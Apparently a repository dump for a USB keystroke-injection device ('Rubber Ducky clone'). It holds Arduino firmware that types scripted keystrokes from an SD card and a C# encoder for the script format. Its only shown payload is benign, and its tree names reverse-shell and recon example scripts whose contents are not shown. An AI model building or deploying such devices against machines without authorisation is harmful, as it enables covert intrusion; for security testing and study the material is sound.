├── Arduino ├── Beetle.jpg ├── Ducky_Clone.ino └── Readme.md ├── Clone_Instructions.pdf ├── Ducky_Commands.pdf ├── Encoder ├── ConsoleEncoder │ ├── DuckyEncoder.sln │ ├── LinuxEncoder │ │ ├── DuckyEncoder.csproj │ │ ├── Program.cs │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ │ └── Debug │ │ │ │ ├── LinuxEncoder.exe │ │ │ │ ├── LinuxEncoder.exe.mdb │ │ │ │ ├── script.bin │ │ │ │ └── testsource.txt │ │ └── obj │ │ │ └── testo │ └── README ├── DuckyEncoder.csproj ├── DuckyEncoder.exe ├── DuckyEncoder.pdb ├── DuckyEncoder.sln ├── DuckyEncoder.v12.suo ├── DuckyEncoder.vshost.exe ├── DuckyEncoder.vshost.exe.manifest ├── Form1.Designer.cs ├── Form1.cs ├── Form1.resx ├── Open_NetCat_ReverseShell_8080.txt ├── Output-Build.txt ├── Program.cs └── UK_KeyboardTest.txt ├── Examples ├── Open_NetCat_ReverseShell_8080.txt ├── readme ├── recon_script_win7_UK.txt └── textSheel.txt └── README.md /Arduino/Beetle.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Arduino/Beetle.jpg -------------------------------------------------------------------------------- /Arduino/Ducky_Clone.ino: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | // ********************************************* 6 | // ** BASIC RUBBER DUCKY CLONE v1.1 ** 7 | // ********************************************* 8 | // ** basic4@privatoria.net Sep. 2015 ** 9 | // ** ** 10 | // ** Requires the encodering App to work ** 11 | // ** correctly. ** 12 | // ********************************************* 13 | // ** Dec 2016 - Added Support for altering ** 14 | // ** key press delay time (0xFA) command. 
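** 15 | // *********************************************

// Name of the encoded script that readFile() opens on the SD card.
String filename = "script.bin";
// 1 while a multi-key command (opened by byte 251, closed by byte 254) is being collected.
int multi = 0;
int kill = 0;    // not referenced anywhere in this sketch
int status = 0;  // not referenced anywhere in this sketch
int Key_On_Delay = 20; //default 20msec keypress delay
// Outcome of readFile(); loop() turns it into an LED pattern.
String result = "READY";

/*
 * Interpret one byte of the encoded script.
 *
 *   251  start of a multi-key command: following bytes are pressed and held
 *   252  press and hold key 130 (the code the encoder writes for "ALT")
 *   253  release key 130
 *   254  end of a multi-key command: release every held key
 *   any other value is typed as one key stroke, or pressed and held when a
 *   multi-key command is open.
 *
 * 0xFA (key delay) and 0xFF (pause) never reach this function; readFile()
 * consumes them together with their operand bytes.
 */
void sendKeyByte(int inpx)
{
  switch (inpx)
  {
    case 251:
      //Start of a multi-key command (eg. CTRL + ALT + DEL)
      multi = 1;
      break;
    case 252:
      //The KEY command on (windows 'ALT' keycodes)
      multi = 0;
      Keyboard.press(130);
      delay(50);
      break;
    case 253:
      //Switches KEY command off
      multi = 0;
      Keyboard.release(130);
      delay(10);
      break;
    case 254:
      //End of a multi-key command
      multi = 0;
      Keyboard.releaseAll();
      delay(10);
      break;
    default:
      if (multi == 0)
      {
        //Normal Single character code
        Keyboard.write(inpx);
        delay(Key_On_Delay);
      }
      else
      {
        //Part of a multi-key command
        Keyboard.press(inpx);
        delay(30);
      }
      break;
  }
}

/*
 * Open `filename` on the SD card (SD.begin is called with pin 10) and replay
 * it byte by byte through the USB keyboard.
 *
 * Returns "SD_ERROR" when the card cannot be initialised, "NO_FILE" when the
 * file is missing or cannot be opened, and "DONE" once the file has been read.
 *
 * Changes against the previous version:
 *  - the 0xFA opcode is now part of the same if/else chain as 0xFF, so it is
 *    no longer also typed as key 250 after the delay has been set;
 *  - read() results are kept as int, so "nothing left to read" (-1) can be
 *    told apart from the data byte 0xFF (the old `byte x > -1` test was
 *    always true);
 *  - a file that ends in the middle of a 0xFF command stops the replay
 *    instead of producing a 255 * 255 pause that overflows a 16-bit int.
 */
String readFile(String filename)
{
  // The log text is kept as it was; the file opened here is the encoded script.
  Serial.println("Opening Password File: " + filename);
  if (!SD.begin(10))
  {
    return ("SD_ERROR");
  }

  // Copy the name into a plain char buffer for the SD calls below.
  char thisFilex[filename.length() + 1];
  filename.toCharArray(thisFilex, filename.length() + 1);

  if (!SD.exists(thisFilex))
  {
    return ("NO_FILE");
  }

  File thisOne = SD.open(thisFilex, FILE_READ);
  if (!thisOne)
  {
    return ("NO_FILE");
  }

  while (thisOne.available())
  {
    int x = thisOne.read();
    if (x < 0)
    {
      break;
    }

    if (x == 0xFA)
    {
      //set the key press delay time for normal
      //characters in a STRING or COMD command
      int k = thisOne.read();
      // Out-of-range values, and a missing operand (-1), fall back to the default.
      if (k > 250 || k < 5)
      {
        Key_On_Delay = 20;
      }
      else
      {
        Key_On_Delay = k;
      }
    }
    else if (x == 0xFF)
    {
      //delay command - read next 2 bytes; the pause is their product in msec
      int a = thisOne.read();
      int b = thisOne.read();
      if (a < 0 || b < 0)
      {
        break; // truncated command at the end of the file
      }
      delay((unsigned long)a * (unsigned long)b);
    }
    else
    {
      sendKeyByte(x);
    }
  }

  thisOne.close();
  return ("DONE");
}

/*
 * Runs once at power-up: LED off, serial and keyboard started, then the whole
 * script is replayed before loop() is entered for the first time.
 */
void setup() {
  pinMode(13, OUTPUT);
  digitalWrite(13, LOW);
  Serial.begin(9600);
  Keyboard.begin();
  delay(300);
  result = readFile(filename);
}

// Blink the LED on pin 13 forever; on and off phases each last halfPeriodMs.
static void blinkForever(unsigned long halfPeriodMs)
{
  while (1)
  {
    digitalWrite(13, HIGH);
    delay(halfPeriodMs);
    digitalWrite(13, LOW);
    delay(halfPeriodMs);
  }
}

void loop() {
  //Set the Outcome via LED
  //SOLID = Completed
  //SLOW FLASH = NO CARD
  //QUICK FLASH = 'script.bin' not found
  if (result == "DONE")
  {
    digitalWrite(13, HIGH);
  }
  if (result == "SD_ERROR")
  {
    blinkForever(1000);
  }
  if (result == "NO_FILE")
  {
    blinkForever(125);
  }
}
-------------------------------------------------------------------------------- /Arduino/Readme.md: -------------------------------------------------------------------------------- 1 | The Arduino Beetle (CJMCU Leonardo) 2 | The .ino file should be upload to beetle via the standard Arduino IDE (http://www.arduino.com) 3 | Please assemble the hardware of the project using the Instructions file.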
4 | -------------------------------------------------------------------------------- /Clone_Instructions.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Clone_Instructions.pdf -------------------------------------------------------------------------------- /Ducky_Commands.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Ducky_Commands.pdf -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/DuckyEncoder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DuckyEncoder", "LinuxEncoder\DuckyEncoder.csproj", "{8D6CFAAC-A849-456C-9191-FB9297FC0101}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|x86 = Debug|x86 9 | Release|x86 = Release|x86 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {8D6CFAAC-A849-456C-9191-FB9297FC0101}.Debug|x86.ActiveCfg = Debug|x86 13 | {8D6CFAAC-A849-456C-9191-FB9297FC0101}.Debug|x86.Build.0 = Debug|x86 14 | {8D6CFAAC-A849-456C-9191-FB9297FC0101}.Release|x86.ActiveCfg = Release|x86 15 | {8D6CFAAC-A849-456C-9191-FB9297FC0101}.Release|x86.Build.0 = Release|x86 16 | EndGlobalSection 17 | EndGlobal 18 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/DuckyEncoder.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Debug 5 | x86 6 | 
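{8D6CFAAC-A849-456C-9191-FB9297FC0101} 7 | Exe 8 | LinuxEncoder 9 | LinuxEncoder 10 | v4.5 11 | 12 | 13 | true 14 | full 15 | false 16 | bin\Debug 17 | DEBUG; 18 | prompt 19 | 4 20 | true 21 | x86 22 | 23 | 24 | full 25 | true 26 | bin\Release 27 | prompt 28 | 4 29 | true 30 | x86 31 | 32 | 33 | 34 | 35 | 36 | 37 | PreserveNewest 38 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/Program.cs: --------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Text;
using System.IO;

namespace DuckyEncoder
{
    /// <summary>
    /// Console encoder: reads a text script (STRING, DELAY, ENTER, COMD, KEY,
    /// KEYDEL, MAP, REM, named keys and "A + B" combinations) and writes the
    /// byte stream for it to script.bin in the current directory.
    /// </summary>
    /// <remarks>
    /// Control bytes written by this class: 250 (0xFA) key delay + 1 operand,
    /// 251 multi-key start, 252 / 253 KEY sequence on / off, 254 multi-key end,
    /// 255 (0xFF) pause + 2 operands whose product is the pause in msec.
    /// </remarks>
    class MainClass
    {
        // Named keys accepted on their own line or inside an "A + B" line,
        // with the key code written for each of them.
        private static readonly Dictionary<String, int> KeyCodes = new Dictionary<String, int>
        {
            { "CTRL", 128 }, { "SHIFT", 129 }, { "ALT", 130 }, { "GUI", 131 },
            { "CTRLR", 132 }, { "SHIFTR", 133 }, { "ALTGR", 134 }, { "GUI_R", 135 },
            { "ESC", 177 }, { "BACKSPACE", 178 }, { "TAB", 179 }, { "CAPS_LOCK", 193 },
            { "F1", 194 }, { "F2", 195 }, { "F3", 196 }, { "F4", 197 },
            { "F5", 198 }, { "F6", 199 }, { "F7", 200 }, { "F8", 201 },
            { "F9", 202 }, { "F10", 203 }, { "F11", 204 }, { "F12", 205 },
            { "INS", 209 }, { "HOME", 210 }, { "PAGE_UP", 211 }, { "DEL", 212 },
            { "PAGE_DOWN", 214 }, { "RHT", 215 }, { "LFT", 216 }, { "DWN", 217 },
            { "UP", 218 }, { "MENU", 237 }
        };

        String ScriptToExecute = String.Empty;
        BinaryWriter dataStreamWriter;
        String mapType = "US";
        // Cleared by errDisp(); makeScript() checks it before reporting success.
        Boolean proceed = true;

        /// <summary>
        /// Entry point. args[0] is the path of the text script to encode.
        /// </summary>
        /// <remarks>
        /// A missing argument is now tested for directly instead of being
        /// detected through a catch-all handler. The old check on the length
        /// of args[0] is gone: it tested the path, not the file, and rejected
        /// short file names with a message about an empty source file.
        /// </remarks>
        public static void Main (string[] args)
        {
            MainClass thisOne = new MainClass();
            Console.WriteLine ("starting conversion...");
            Console.WriteLine("");
            if (args.Length == 0 || String.IsNullOrWhiteSpace(args[0]))
            {
                Console.WriteLine ("error: did you specify a source script file?");
            }
            else
            {
                thisOne.findScriptFile (args [0]);
                if (thisOne.ScriptToExecute.Length > 5)
                {
                    thisOne.makeScript();
                }
            }
            Console.WriteLine ("exiting...");
        }

        /// <summary>
        /// Text that follows a keyword and its single separator character;
        /// empty when the line ends at the keyword.
        /// </summary>
        private static String argumentOf(String line, int keywordLength)
        {
            return line.Length > keywordLength + 1 ? line.Substring(keywordLength + 1) : String.Empty;
        }

        /// <summary>
        /// Encode one script line. Number format errors (DELAY, KEYDEL)
        /// propagate to encodeScript(), which reports the line and stops.
        /// </summary>
        private void processLine(String comline)
        {
            if (comline.StartsWith("STRING"))
            {
                //Send the string chars one at a time
                sendData(argumentOf(comline, 6));
                return;
            }
            if (comline.StartsWith("DELAY"))
            {
                //Wait given millsecs, written in units of 50ms (rounded up)
                int delTime = Convert.ToInt32(argumentOf(comline, 5));
                if (delTime > 0)
                {
                    int units = delTime / 50 + (delTime % 50 != 0 ? 1 : 0);
                    // The unit count is a single byte. Longer pauses are written as
                    // several delay commands; previously the count was masked to
                    // 8 bits, so anything above 12750 ms silently wrapped around.
                    while (units > 0)
                    {
                        int chunk = Math.Min(units, 255);
                        sendData(0xff); //delay command code
                        sendData(chunk);
                        sendData(0x32);
                        units -= chunk;
                    }
                }
                return;
            }
            if (comline.StartsWith("REM"))
            {
                //Remark line - just ignore it.
                return;
            }
            if (comline.StartsWith("ENTER"))
            {
                //Send a Return
                byte k = (byte)176; //'B0'
                sendData(k);
                return;
            }
            if (comline.StartsWith("COMD"))
            {
                //Send full command line plus return
                sendCommandData(argumentOf(comline, 4));
                return;
            }
            if (comline.StartsWith("KEYDEL"))
            {
                //Alter default key 'down' time in msecs.
                // Must be tested before "KEY": with the old order every KEYDEL line
                // matched the KEY branch and this one was unreachable. The Windows
                // Forms encoder in this repository spells the same command WAITKEY.
                int del = Convert.ToInt32(argumentOf(comline, 6).Replace(" ", ""));
                if (del > 4 && del < 251)
                {
                    sendData(250 & 0xff);
                    sendData(del & 0xff);
                }
                return;
            }
            if (comline.StartsWith("KEY"))
            {
                //Send a windows ALT key combo (eg. 'ALT + 0124')
                sendData(252 & 0xff);
                //numberpad keys inputs; anything that is not a digit is skipped,
                //it used to be turned into an arbitrary code by getNumericPad
                foreach (char digit in argumentOf(comline, 3))
                {
                    if (digit >= '0' && digit <= '9')
                    {
                        sendData(getNumericPad(digit) & 0xff);
                    }
                }
                //signal sequence end
                sendData(253 & 0xff);
                return;
            }
            if (comline.StartsWith("MAP"))
            {
                mapType = argumentOf(comline, 3).Replace(" ", "");
                return;
            }

            //Compound Command or Special Key
            if (comline.IndexOf('+') > 0)
            {
                //Multi-Key Special Character
                String[] parts = comline.Split(new String[] { "+" }, StringSplitOptions.RemoveEmptyEntries);

                sendData(251 & 0xff); //signal multi start
                foreach (String part in parts)
                {
                    String mako = part.Replace(" ", "");
                    int code = getKeyCode(mako);
                    if (code > 0)
                    {
                        sendData(code & 0xff);
                    }
                    else
                    {
                        sendData(mako);
                    }
                }
                sendData(254 & 0xff); //signal multi end
                return;
            }

            //Single Special Key; unknown names write nothing
            int single = getKeyCode(comline.Replace(" ", ""));
            if (single > 0)
            {
                sendData(single & 0xff);
            }
        }

        /// <summary>Key code for a named key, or -1 when the name is unknown.</summary>
        private int getKeyCode(String subcom)
        {
            int code;
            if (subcom != null && KeyCodes.TryGetValue(subcom, out code))
            {
                return code;
            }
            return -1;
        }

        /// <summary>
        /// Swap the characters whose key codes differ between US and UK
        /// keyboards. Only applied when the script selected "MAP UK"; other
        /// layouts are not supported.
        /// </summary>
        private char replaceKey(char inp)
        {
            if (mapType != "UK")
            {
                return inp;
            }
            switch ((int)inp)
            {
                case 64:  return (char)34;    // @
                case 34:  return (char)64;    // "
                case 35:  return (char)186;   // #
                case 126: return (char)124;   // ~
                case 47:  return (char)192;   // Forward slash (/)
                case 92:  return (char)0xec;  // Back slash (\)
                default:  return inp;
            }
        }

        /// <summary>
        /// Numeric pad key code for a digit: '1'..'9' give 225..233,
        /// anything else gives 234, the code used for '0'.
        /// </summary>
        int getNumericPad(char inx)
        {
            if (inx >= '1' && inx <= '9')
            {
                return 224 + (inx - '0');
            }
            return 234;
        }

        // Write the low byte of `value` to script.bin.
        private void writeByte(int value)
        {
            dataStreamWriter.Write(unchecked((byte)value));
        }

        // Write every character of `text`, applying the UK substitutions.
        // NOTE(review): a character whose low byte is 0xFA-0xFF is written as it
        // is. The sketch in Arduino/Ducky_Clone.ino reads those values as control
        // bytes (0xFA and 0xFF also consume the byte or bytes that follow), so
        // such characters in STRING/COMD text are not typed as characters.
        private void writeText(String text)
        {
            foreach (char c in text)
            {
                int b = c & 0xff;
                if (mapType == "UK" && b == 0x7C)
                {
                    sendUKPipe();
                }
                else
                {
                    writeByte(replaceKey((char)b));
                }
            }
        }

        /// <summary>Write a command line followed by a newline character.</summary>
        void sendCommandData(String inputx)
        {
            try
            {
                writeText(inputx + "\n");
            }
            catch (Exception ex)
            {
                errDisp(ex);
            }
        }

        /// <summary>Write the characters of a string.</summary>
        private void sendData(String inpx)
        {
            try
            {
                writeText(inpx);
            }
            catch (Exception ex)
            {
                errDisp(ex);
            }
        }

        /// <summary>Write one key byte; under MAP UK the pipe (0x7C) becomes a key sequence.</summary>
        private void sendData(byte inx)
        {
            try
            {
                if (mapType == "UK" && inx == 0x7C)
                {
                    sendUKPipe();
                }
                else
                {
                    writeByte(inx);
                }
            }
            catch (Exception ex)
            {
                errDisp(ex);
            }
        }

        /// <summary>Write the low byte of a raw value, with no layout substitution.</summary>
        private void sendData(int ipx)
        {
            try
            {
                writeByte(ipx & 0xff);
            }
            catch (Exception ex)
            {
                errDisp(ex);
            }
        }

        // UK pipe character: multi-key start, SHIFT (129), key 0xec, multi-key end.
        private void sendUKPipe()
        {
            sendData(251 & 0xff);
            sendData(129 & 0xff);
            sendData(0xec & 0xff);
            sendData(254 & 0xff);
        }

        /// <summary>
        /// Encode a loaded script line by line. Encoding stops at the first
        /// line that fails; the line is echoed so the error can be located.
        /// </summary>
        private void encodeScript(String file)
        {
            // Accept CRLF, LF and CR endings on every platform. Splitting on
            // Environment.NewLine alone leaves a trailing '\r' on each line when a
            // Windows-edited script is encoded on Linux, and key names such as
            // "GUI\r" were then not recognised.
            String[] lines = file.Split(new string[] { "\r\n", "\n", "\r" }, StringSplitOptions.RemoveEmptyEntries);
            foreach (String line in lines)
            {
                try
                {
                    processLine(line);
                }
                catch (Exception ex)
                {
                    Console.WriteLine("error: could not encode line: " + line);
                    errDisp(ex);
                    return;
                }
            }
        }

        /// <summary>Load the source script into ScriptToExecute.</summary>
        private void findScriptFile(string fileToLoad)
        {
            if (!File.Exists(fileToLoad))
            {
                Console.WriteLine("can't find file..." + fileToLoad.ToString());
                return;
            }
            try
            {
                this.ScriptToExecute = File.ReadAllText(fileToLoad);
                Console.WriteLine("file loaded...");
            }
            catch (Exception ex)
            {
                errDisp(ex);
            }
        }

        /// <summary>
        /// Write script.bin from the loaded script. Success is reported only
        /// when no error was recorded while encoding; before, "script generated
        /// OK" was printed even when encoding had stopped part-way through.
        /// </summary>
        private void makeScript()
        {
            if (this.ScriptToExecute.Length <= 5)
            {
                Console.WriteLine ("error: source file seems to be near empty.");
                return;
            }
            try
            {
                // FileMode.Create replaces an existing file, so the separate delete
                // (which tested the misspelled name "sctipt.bin") is not needed.
                using (BinaryWriter writer = new BinaryWriter (new FileStream ("script.bin", FileMode.Create)))
                {
                    dataStreamWriter = writer;
                    encodeScript (this.ScriptToExecute);
                }
                if (proceed)
                {
                    Console.WriteLine ("script generated OK...'script.bin'");
                }
                else
                {
                    Console.WriteLine ("error: encoding stopped early, 'script.bin' is incomplete.");
                }
            }
            catch (Exception ex)
            {
                errDisp (ex);
            }
        }

        // Print the error and remember that this run failed.
        private void errDisp(Exception ex)
        {
            Console.WriteLine("error: " + ex.Message.ToString());
            proceed = false;
        }
    }
}
-------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | 4 | // Information about this assembly is defined by the following attributes. 5 | // Change them to the values specific to your project. 6 | 7 | [assembly: AssemblyTitle ("LinuxEncoder")] 8 | [assembly: AssemblyDescription ("")] 9 | [assembly: AssemblyConfiguration ("")] 10 | [assembly: AssemblyCompany ("")] 11 | [assembly: AssemblyProduct ("")] 12 | [assembly: AssemblyCopyright ("bobo")] 13 | [assembly: AssemblyTrademark ("")] 14 | [assembly: AssemblyCulture ("")] 15 | 16 | // The assembly version has the format "{Major}.{Minor}.{Build}.{Revision}". 17 | // The form "{Major}.{Minor}.*" will automatically update the build and revision, 18 | // and "{Major}.{Minor}.{Build}.*" will update just the revision.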
19 | 20 | [assembly: AssemblyVersion ("1.0.*")] 21 | 22 | // The following attributes are used to specify the signing key for the assembly, 23 | // if desired. See the Mono documentation for more information about signing. 24 | 25 | //[assembly: AssemblyDelaySign(false)] 26 | //[assembly: AssemblyKeyFile("")] 27 | 28 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/LinuxEncoder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/LinuxEncoder.exe -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/LinuxEncoder.exe.mdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/LinuxEncoder.exe.mdb -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/script.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/script.bin -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/testsource.txt: -------------------------------------------------------------------------------- 1 | MAP UK 2 | DELAY 4000 3 | GUI 4 | DELAY 100 5 | STRING iexplore.exe http://www.bbc.co.uk/news 6 | DELAY 50 7 | ENTER 8 | 
-------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/obj/testo: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/README: -------------------------------------------------------------------------------- 1 | This is a Windows console version of the encoder application. The version in the main folder is a Windows Forms application. 2 | -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01} 8 | WinExe 9 | Properties 10 | DuckyEncoder 11 | DuckyEncoder 12 | v3.0 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | Form 45 | 46 | 47 | Form1.cs 48 | 49 | 50 | 51 | 52 | Form1.cs 53 | 54 | 55 | ResXFileCodeGenerator 56 | Resources.Designer.cs 57 | Designer 58 | 59 | 60 | True 61 | Resources.resx 62 | 63 | 64 | SettingsSingleFileGenerator 65 | Settings.Designer.cs 66 | 67 | 68 | True 69 | Settings.settings 70 | True 71 | 72 | 73 | 74 | 81 | -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/DuckyEncoder.exe -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.pdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/DuckyEncoder.pdb -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.40629.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DuckyEncoder", "DuckyEncoder\DuckyEncoder.csproj", "{19657F10-CB2E-4F00-BB2A-80AC1124FB01}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/DuckyEncoder.v12.suo -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.vshost.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/DuckyEncoder.vshost.exe -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /Encoder/Form1.Designer.cs: --------------------------------------------------------------------------------
namespace DuckyEncoder
{
    // Designer half of the encoder's main form: it declares the controls and
    // wires button1, button2 and button3 to their Click handlers.
    partial class frm_Main
    {
        /// <summary>
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.IContainer components = null;

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        #region Windows Form Designer generated code

        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            this.openFileDialog1 = new System.Windows.Forms.OpenFileDialog();
            this.label1 = new System.Windows.Forms.Label();
            this.button1 = new System.Windows.Forms.Button();
            this.textBox1 = new System.Windows.Forms.TextBox();
            this.button2 = new System.Windows.Forms.Button();
            this.button3 = new System.Windows.Forms.Button();
            this.label2 = new System.Windows.Forms.Label();
            this.SuspendLayout();
            //
            // openFileDialog1
            //
            this.openFileDialog1.FileName = "openFileDialog1";
            //
            // label1
            //
            this.label1.AutoSize = true;
            this.label1.Location = new System.Drawing.Point(81, 9);
            this.label1.Name = "label1";
            this.label1.Size = new System.Drawing.Size(80, 13);
            this.label1.TabIndex = 0;
            this.label1.Text = "Script File Input";
            //
            // button1
            //
            this.button1.Location = new System.Drawing.Point(15, 25);
            this.button1.Name = "button1";
            this.button1.Size = new System.Drawing.Size(63, 23);
            this.button1.TabIndex = 1;
            this.button1.Text = "Load";
            this.button1.UseVisualStyleBackColor = true;
            this.button1.Click += new System.EventHandler(this.button1_Click);
            //
            // textBox1
            //
            this.textBox1.Location = new System.Drawing.Point(84, 28);
            this.textBox1.Name = "textBox1";
            this.textBox1.Size = new System.Drawing.Size(480, 20);
            this.textBox1.TabIndex = 2;
            //
            // button2
            //
            this.button2.Location = new System.Drawing.Point(489, 64);
            this.button2.Name = "button2";
            this.button2.Size = new System.Drawing.Size(75, 23);
            this.button2.TabIndex = 3;
            this.button2.Text = "Exit";
            this.button2.UseVisualStyleBackColor = true;
            this.button2.Click += new System.EventHandler(this.button2_Click);
            //
            // button3
            //
            this.button3.Location = new System.Drawing.Point(369, 64);
            this.button3.Name = "button3";
            this.button3.Size = new System.Drawing.Size(93, 23);
            this.button3.TabIndex = 4;
            this.button3.Text = "Encode";
            this.button3.UseVisualStyleBackColor = true;
            this.button3.Click += new System.EventHandler(this.button3_Click);
            //
            // label2
            //
            this.label2.AutoSize = true;
            this.label2.Font = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label2.ForeColor = System.Drawing.Color.Blue;
            this.label2.Location = new System.Drawing.Point(81, 69);
            this.label2.Name = "label2";
            this.label2.Size = new System.Drawing.Size(167, 13);
            this.label2.TabIndex = 5;
            this.label2.Text = "PRESS \'LOAD\' TO SELECT FILE";
            //
            // frm_Main
            //
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.ClientSize = new System.Drawing.Size(578, 101);
            this.ControlBox = false;
            this.Controls.Add(this.label2);
            this.Controls.Add(this.button3);
            this.Controls.Add(this.button2);
            this.Controls.Add(this.textBox1);
            this.Controls.Add(this.button1);
            this.Controls.Add(this.label1);
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
            this.Name = "frm_Main";
            this.Text = "Ducky_Encoder (basic4@privatoria.net)";
            this.Load += new System.EventHandler(this.frm_Main_Load);
            this.ResumeLayout(false);
            this.PerformLayout();

        }

        #endregion

        private System.Windows.Forms.OpenFileDialog openFileDialog1;
        private System.Windows.Forms.Label label1;
        private System.Windows.Forms.Button button1;
        private System.Windows.Forms.TextBox textBox1;
        private System.Windows.Forms.Button button2;
        private System.Windows.Forms.Button button3;
        private System.Windows.Forms.Label label2;
    }
